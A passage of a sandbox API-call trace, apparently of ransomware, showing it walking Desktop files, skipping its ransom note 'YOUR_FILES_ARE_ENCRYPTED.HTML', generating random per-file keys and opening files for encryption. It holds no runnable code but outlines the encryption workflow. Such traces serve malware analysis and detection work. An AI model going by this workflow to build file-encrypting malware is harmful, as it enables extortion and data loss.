param_2="%02X" | out: param_1="26") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="49") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="7A") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="FF") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd9a, 
param_2="%02X" | out: param_1="BB") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="EF") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="6D") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="94") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="04") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="FA") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="29") returned 2 [0166.414] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="DD") returned 2 [0166.415] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="51") returned 2 [0166.415] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="11") returned 2 [0166.415] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\UFJ2mOfKA7l3w86naRrT.doc" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\UFJ2mOfKA7l3w86naRrT.doc") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\UFJ2mOfKA7l3w86naRrT.doc" [0166.415] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.415] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.421] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadd72860, ftCreationTime.dwHighDateTime=0x1d7d8b8, ftLastAccessTime.dwLowDateTime=0x43886ca0, ftLastAccessTime.dwHighDateTime=0x1d7e126, ftLastWriteTime.dwLowDateTime=0x43886ca0, ftLastWriteTime.dwHighDateTime=0x1d7e126, nFileSizeHigh=0x0, nFileSizeLow=0x1a8b, dwReserved0=0x0, dwReserved1=0x60, cFileName="wrMNMVP8WtPmed_v jD.odp", cAlternateFileName="WRMNMV~1.ODP")) 
returned 1 [0166.421] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\wrMNMVP8WtPmed_v jD.odp") returned 55 [0166.421] lstrcmpW (lpString1="wrMNMVP8WtPmed_v jD.odp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.421] PathFindExtensionW (pszPath="wrMNMVP8WtPmed_v jD.odp") returned=".odp" [0166.421] lstrlenW (lpString=".odp") returned 4 [0166.421] PathFindExtensionW (pszPath="wrMNMVP8WtPmed_v jD.odp") returned=".odp" [0166.421] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.421] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\wrMNMVP8WtPmed_v jD.odp" (normalized: "c:\\users\\5alr3u30d3\\desktop\\wrmnmvp8wtpmed_v jd.odp"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.422] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=6795) returned 1 [0166.422] GetProcessHeap () returned 0x270000 [0166.422] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.427] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="8F") returned 2 [0166.427] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="0C") returned 2 [0166.427] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="26") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="2A") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="99") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="12") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="EE") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="CB") returned 2 [0166.428] wsprintfW (in: 
param_1=0x4ebdd62, param_2="%02X" | out: param_1="9B") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="0C") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="10") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="93") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="B5") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="A6") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="04") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="ED") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="91") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="60") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="72") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="BF") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="D4") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="CA") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="77") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="C9") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="0D") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="88") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="53") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="1C") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="BF") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="80") returned 2 
[0166.428] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="71") returned 2 [0166.428] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="64") returned 2 [0166.429] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\wrMNMVP8WtPmed_v jD.odp" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\wrMNMVP8WtPmed_v jD.odp") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\wrMNMVP8WtPmed_v jD.odp" [0166.429] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.429] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.440] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdab444e0, ftCreationTime.dwHighDateTime=0x1d7de0c, ftLastAccessTime.dwLowDateTime=0xac16b480, ftLastAccessTime.dwHighDateTime=0x1d7e72e, ftLastWriteTime.dwLowDateTime=0xac16b480, ftLastWriteTime.dwHighDateTime=0x1d7e72e, nFileSizeHigh=0x0, nFileSizeLow=0x391a, dwReserved0=0x0, dwReserved1=0x60, cFileName="WWKJRamk_dmY6.flv", cAlternateFileName="WWKJRA~1.FLV")) returned 1 [0166.440] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\WWKJRamk_dmY6.flv") returned 49 [0166.440] lstrcmpW (lpString1="WWKJRamk_dmY6.flv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.440] PathFindExtensionW (pszPath="WWKJRamk_dmY6.flv") returned=".flv" [0166.440] lstrlenW (lpString=".flv") returned 4 [0166.440] PathFindExtensionW (pszPath="WWKJRamk_dmY6.flv") returned=".flv" [0166.440] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.440] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\WWKJRamk_dmY6.flv" 
(normalized: "c:\\users\\5alr3u30d3\\desktop\\wwkjramk_dmy6.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.452] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=14618) returned 1 [0166.452] GetProcessHeap () returned 0x270000 [0166.452] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.456] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="08") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="19") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="41") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="A8") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="45") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="B3") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="D5") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="A4") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="42") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="27") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="16") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="84") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="77") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="26") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="6F") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="DB") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd82, 
param_2="%02X" | out: param_1="D0") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="48") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="6E") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="27") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="6A") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="1A") returned 2 [0166.456] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="3C") returned 2 [0166.457] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="84") returned 2 [0166.457] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="6F") returned 2 [0166.457] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="78") returned 2 [0166.457] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="F2") returned 2 [0166.457] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="60") returned 2 [0166.457] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="8F") returned 2 [0166.457] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="6E") returned 2 [0166.457] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="95") returned 2 [0166.457] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="1C") returned 2 [0166.457] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\WWKJRamk_dmY6.flv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\WWKJRamk_dmY6.flv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\WWKJRamk_dmY6.flv" [0166.457] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.457] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 
[0166.465] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb13f6f0, ftCreationTime.dwHighDateTime=0x1d7df79, ftLastAccessTime.dwLowDateTime=0xc7d7d4e0, ftLastAccessTime.dwHighDateTime=0x1d7e564, ftLastWriteTime.dwLowDateTime=0xc7d7d4e0, ftLastWriteTime.dwHighDateTime=0x1d7e564, nFileSizeHigh=0x0, nFileSizeLow=0xbd86, dwReserved0=0x0, dwReserved1=0x60, cFileName="xfwS5W2XuLkEZxGrlS1I.mkv", cAlternateFileName="XFWS5W~1.MKV")) returned 1 [0166.465] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\xfwS5W2XuLkEZxGrlS1I.mkv") returned 56 [0166.465] lstrcmpW (lpString1="xfwS5W2XuLkEZxGrlS1I.mkv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.465] PathFindExtensionW (pszPath="xfwS5W2XuLkEZxGrlS1I.mkv") returned=".mkv" [0166.465] lstrlenW (lpString=".mkv") returned 4 [0166.465] PathFindExtensionW (pszPath="xfwS5W2XuLkEZxGrlS1I.mkv") returned=".mkv" [0166.465] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x244d35f0, ftCreationTime.dwHighDateTime=0x1d7e2ca, ftLastAccessTime.dwLowDateTime=0x1f11eda0, ftLastAccessTime.dwHighDateTime=0x1d7e4d3, ftLastWriteTime.dwLowDateTime=0x1f11eda0, ftLastWriteTime.dwHighDateTime=0x1d7e4d3, nFileSizeHigh=0x0, nFileSizeLow=0x16711, dwReserved0=0x0, dwReserved1=0x60, cFileName="ynEfaXS3MQ9Ek4.wav", cAlternateFileName="YNEFAX~1.WAV")) returned 1 [0166.465] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ynEfaXS3MQ9Ek4.wav") returned 50 [0166.465] lstrcmpW (lpString1="ynEfaXS3MQ9Ek4.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.465] PathFindExtensionW (pszPath="ynEfaXS3MQ9Ek4.wav") returned=".wav" [0166.465] lstrlenW (lpString=".wav") returned 4 [0166.465] 
PathFindExtensionW (pszPath="ynEfaXS3MQ9Ek4.wav") returned=".wav" [0166.465] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.466] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ynEfaXS3MQ9Ek4.wav" (normalized: "c:\\users\\5alr3u30d3\\desktop\\ynefaxs3mq9ek4.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.466] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=91921) returned 1 [0166.466] GetProcessHeap () returned 0x270000 [0166.466] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.467] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="20") returned 2 [0166.467] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="03") returned 2 [0166.467] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="0B") returned 2 [0166.467] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="56") returned 2 [0166.467] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="68") returned 2 [0166.467] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="7E") returned 2 [0166.467] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="20") returned 2 [0166.467] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="F1") returned 2 [0166.467] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="7E") returned 2 [0166.467] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="2B") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="73") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="BD") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="7D") returned 2 [0166.468] wsprintfW (in: 
param_1=0x4ebdd76, param_2="%02X" | out: param_1="6B") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="08") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="03") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="61") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="61") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="DD") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="1D") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="07") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="21") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="42") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="CB") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="1A") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="AF") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="B9") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="30") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="9B") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="E5") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="E1") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="5A") returned 2 [0166.469] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ynEfaXS3MQ9Ek4.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ynEfaXS3MQ9Ek4.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ynEfaXS3MQ9Ek4.wav" [0166.469] 
CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.469] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.474] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77800140, ftCreationTime.dwHighDateTime=0x1d7e1ca, ftLastAccessTime.dwLowDateTime=0xe0fba180, ftLastAccessTime.dwHighDateTime=0x1d7e731, ftLastWriteTime.dwLowDateTime=0xe0fba180, ftLastWriteTime.dwHighDateTime=0x1d7e731, nFileSizeHigh=0x0, nFileSizeLow=0x107b7, dwReserved0=0x0, dwReserved1=0x60, cFileName="YpHrE3CL0ZTRQROVql.ppt", cAlternateFileName="YPHRE3~1.PPT")) returned 1 [0166.474] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\YpHrE3CL0ZTRQROVql.ppt") returned 54 [0166.474] lstrcmpW (lpString1="YpHrE3CL0ZTRQROVql.ppt", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 1 [0166.474] PathFindExtensionW (pszPath="YpHrE3CL0ZTRQROVql.ppt") returned=".ppt" [0166.474] lstrlenW (lpString=".ppt") returned 4 [0166.474] PathFindExtensionW (pszPath="YpHrE3CL0ZTRQROVql.ppt") returned=".ppt" [0166.474] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.474] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\YpHrE3CL0ZTRQROVql.ppt" (normalized: "c:\\users\\5alr3u30d3\\desktop\\yphre3cl0ztrqrovql.ppt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.479] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=67511) returned 1 [0166.480] GetProcessHeap () returned 0x270000 [0166.480] RtlAllocateHeap 
(HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.480] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="F0") returned 2 [0166.480] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="D6") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="DF") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="2F") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="CE") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="A3") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="23") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="3E") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="00") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="71") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="9D") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="C8") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="47") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="26") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="67") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="C4") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="B7") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="19") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="AB") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="16") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="58") returned 2 
[0166.481] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="C4") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="96") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="EE") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="C0") returned 2 [0166.482] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="41") returned 2 [0166.482] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="91") returned 2 [0166.482] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="48") returned 2 [0166.482] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="10") returned 2 [0166.482] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="3E") returned 2 [0166.482] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="FF") returned 2 [0166.482] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="19") returned 2 [0166.482] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\YpHrE3CL0ZTRQROVql.ppt" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\YpHrE3CL0ZTRQROVql.ppt") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\YpHrE3CL0ZTRQROVql.ppt" [0166.482] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.483] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.494] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b43d50, ftCreationTime.dwHighDateTime=0x1d7dd67, ftLastAccessTime.dwLowDateTime=0x474508e0, ftLastAccessTime.dwHighDateTime=0x1d7e2ba, ftLastWriteTime.dwLowDateTime=0x474508e0, ftLastWriteTime.dwHighDateTime=0x1d7e2ba, nFileSizeHigh=0x0, 
nFileSizeLow=0xa4fd, dwReserved0=0x0, dwReserved1=0x60, cFileName="yTVqJ0atNbrX.jpg", cAlternateFileName="YTVQJ0~1.JPG")) returned 1 [0166.494] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\yTVqJ0atNbrX.jpg") returned 48 [0166.494] lstrcmpW (lpString1="yTVqJ0atNbrX.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 1 [0166.494] PathFindExtensionW (pszPath="yTVqJ0atNbrX.jpg") returned=".jpg" [0166.494] lstrlenW (lpString=".jpg") returned 4 [0166.494] PathFindExtensionW (pszPath="yTVqJ0atNbrX.jpg") returned=".jpg" [0166.494] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.494] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\yTVqJ0atNbrX.jpg" (normalized: "c:\\users\\5alr3u30d3\\desktop\\ytvqj0atnbrx.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, 